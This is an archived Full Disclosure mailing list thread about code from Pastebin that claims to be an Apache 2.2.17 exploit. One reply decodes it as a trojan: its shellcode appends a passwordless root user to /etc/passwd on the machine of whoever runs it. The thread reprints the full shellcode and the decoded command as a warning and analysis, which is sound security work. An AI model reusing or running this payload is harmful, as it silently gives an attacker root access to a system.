Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: xD 0x41 <secn3t () gmail com>
Date: Wed, 5 Oct 2011 13:21:17 +1100
yer it is clarly leet stuff dude... i ran it and got liek 2000000000000000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS <venom () gen-x co nz> wrote:
** char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47 \x89" "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51 \x89" "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80 \xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63 \x23" "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30 \x74" "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65 \x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73 \x68" "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77 \x64" "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44 \x44" "\x44\x44" ..... execl("/bin/sh", "sh", "-c", evil, 0); ..... /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd AHUH..... On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89" 3. "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89" 4. "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8" 5. "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23" 6. "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74" 7. "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a" 8. "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68" 9. "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64" 10. "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43 \x43\x44\x44" 11. "\x44\x44"; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Apache 2.2.17 exploit?, (continued)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? nix (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Nathaniel Hirsch (Oct 03)
- Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 03)
- Re: Apache 2.2.17 exploit? Guillaume Friloux (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)